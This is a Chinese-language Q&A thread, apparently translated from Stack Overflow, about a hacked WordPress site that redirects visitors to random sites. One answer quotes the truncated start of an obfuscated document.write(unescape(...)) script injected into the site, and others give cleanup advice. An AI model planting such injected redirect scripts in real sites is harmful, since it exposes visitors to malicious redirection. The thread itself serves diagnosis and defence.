代码之家  ›  专栏  ›  技术社区  ›  Seth Spearman

wordpress网站在加载后自动重定向[关闭]

  •  0
  • Seth Spearman  · 技术社区  · 14 年前

    我在superuser.com上问了以下问题,问题结束了。也许应该在serverfault.com上查询。不确定。

    但它在这里,所以希望它能得到一些牵引力。

    你好,

    我有一个WordPress网站。它不是WordPress.com网站。这个网站本周末在godaddy.com上托管,每当我启动浏览器并加载登陆(或任何其他页面)时,它就会加载(火狐会说“完成”),然后在暂停1秒后,浏览器会重定向到一些看似随机的网站。

    不幸的是(或幸运的是?)这是间歇性故障。

    我为我的WordPress管理员使用难以破解的密码。

    对如何排除故障或问题是什么有什么看法?

    塞思

    编辑
    是的,网址是 http://www.meeting-minutes.org . 据记录,我在这里转载我的问题时没有包含URL的原因是我认为有人可能认为我只是在试图推广我在网站上引用的软件。这真的不是我的目的。

    编辑 谢谢你的帮助。我只是通过重命名托管文件夹(所以现在它返回404,这很好。)我将清理它,并在清理后重新部署。

    对于我的生活,我不知道这是怎么发生的。

    塞思

    3 回复  |  直到 8 年前
        1
  •  3
  •   markratledge    14 年前
        2
  •  4
  •   Pekka    14 年前

    你的日志肯定被黑客入侵了。我可以在你博客的源代码中看到非常邪恶的javascript代码:

    <script language=javascript>document.write(unescape('%3C%73%63%72%69......
    

    正如您所说,重定向到其他站点可能是代码。你的博客的安全性一定受到了某种程度的破坏,这肯定在你的模板的源代码中。

    你应该下载所有东西,并立即把网站拿下来,以保护你的访问者和你的网站的声誉(以防止它进入任何恶意软件黑名单)。查看第二个链接中的“让你的网站离线”一章。我不知道你使用的是哪个版本的Wordpress,也许wp的论坛可以帮助你了解如何发生了入侵。也许这也是一个好主意,通知主办公司,看看他们是否可以提供任何额外的信息。如果您有权访问任何日志文件,请获取一份副本并查看它们是否告诉您任何信息。

    链接:

    以后可能:

        3
  •  0
  •   dj_segfault    14 年前

    我会尝试在关闭javascript的情况下访问该站点。这将是一种验证是否有人将其上传的快速方法。它当然可以被写成间歇地开火。

    如果您对服务器有文件访问权,我将查看.htaccess文件,它可能重写了其中的规则。

    最后,我会尝试通过IP地址访问该网站以检测DNS问题,但我发现它极不可能以这种方式工作。

    别忘了仔细观察主题的变化,这是最有可能的攻击途径。